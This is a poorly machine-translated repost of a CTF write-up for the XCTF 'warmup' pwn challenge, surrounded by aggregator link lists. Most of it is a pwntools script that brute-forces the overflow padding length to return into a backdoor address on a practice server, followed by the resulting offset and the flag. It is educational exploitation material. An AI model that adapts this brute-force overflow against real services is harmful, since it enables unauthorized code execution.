XCTF warmup - Code World

XCTF warmup

Others 2020-03-11 10:50:52 views: null

This problem no binary files
~~easiest comfortably pwn a problem~~ . Although difficult subject I will not
have only one ip and a port
nc connection to go up
Here Insert Picture Description
discovery process will give us a return address
guess this address is the address of the function of the back door
wrote a blasting procedure

from pwn import *

def blast(ip,port,padd_start,padd_end,addr):
	for i in range(padd_start,padd_end):
		try:
			p = remote(ip,port)
			p.recvuntil(">")
			payload = 'a' * i + p32(addr)
			print("32bit payload len =",i)
			p.sendline(payload)
			r = p.recv()
			if "Warm Up" in r:
				continue
			print('recv::length='+ str(len(r)) + ',content='+ r)
			p.close()
			break
		except Exception as e:
			p.close()

		try:
			p = remote(ip,port)
			p.recvuntil(">")
			payload = 'a' * i + p64(addr)
			print("64bit payload len =",i)
			p.sendline(payload)
			r = p.recv()
			if "Warm Up" in r:
				continue
			print('recv: ' + r)
			p.close()
			break
		except Exception as e:
			p.close()

blast("111.198.29.45",54880,0,200,0x40060d)

Here Insert Picture Description
Blasting Results
padding length is 72, the program 64 is a program
flag:

cyberpeace{3c720a366924ded4e8cab660474da845}

Released nine original articles · won praise 3 · Views 236

Private letter concerns

Guess you like

Origin blog.csdn.net/qin9800/article/details/104781656

XCTF warmup

XCTF warmup write up

[HCTF 2018]WarmUp

pytroch implements warmup code

攻防世界-warmup题

School tournament _warmup_pwn

HCTF 2018 Warmup (API functions)

[BUUOJ Record] [HCTF 2018] WarmUp

buuctf web [HCTF 2018]WarmUp

Question 1——[HCTF 2018]WarmUp

XCTF rebounds

XCTF cookie

xctf - forgot

XCTF logmein

XCTF Cat

XCTF supersqli

XCTF EasyRE

SCTF2019 Crypto-warmup writeup

[Reprint] Ali JDK warm warmup process

csaw ctf 2016 quals-warmup

CTF (pwn) offensive and defensive world warmup

Cache warmup + cache update + cache downgrade

Neural Network Tuning-warmup and decay

pytorch: cosine annealing learning strategy and warmup

XCTF (app2)

XCTF Web msf

XCTF-web2

XCTF get_post

XCTF web2

xctf-web supersqli

Recommended

The sixth meeting of openKylin Community Ecology Committee was successfully held

Alibaba Cloud officially releases Tongyi Qianwen 2.5

Python 3.13 releases first Beta: experimental free-threading mode and JIT, improved interactive interpreter

Stack Overflow used my code to train large AI models and banned my account.

Pop!_OS’s COSMIC desktop completes App Store listing

Report: Django is still the first choice for 74% of developers

"Internet Investment and Financing Operation in the First Quarter of 2024" Research Report

15 years ago, he was on the "FFmpeg pillar of shame", and today he still has to thank us - Tencent QQPlayer avenges its shame?

Ranking

Python handwritten digit recognition, the corresponding mathematical formulas and Detailed procedures

Der M-Chip-Mac implementiert mehrere Android-Emulatoren

CentOS 명령줄 모드에서 화면이 항상 켜져 있도록 설정 ---- 예상한 효과를 얻지 못했습니다.

Teach you step by step how to use GDB to debug programs: a comprehensive guide from entry to mastery

python3 pip ipython installation

A lot of python crawler source code sharing -- talk about the little thing about python crawler

Agile Sprint in Alpha Stage (7)

Access URL in Unity

FunctoinDemo form

MS SQL common SQL statements (6): create, modify, delete triggers and other operations sq

Daily

More

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)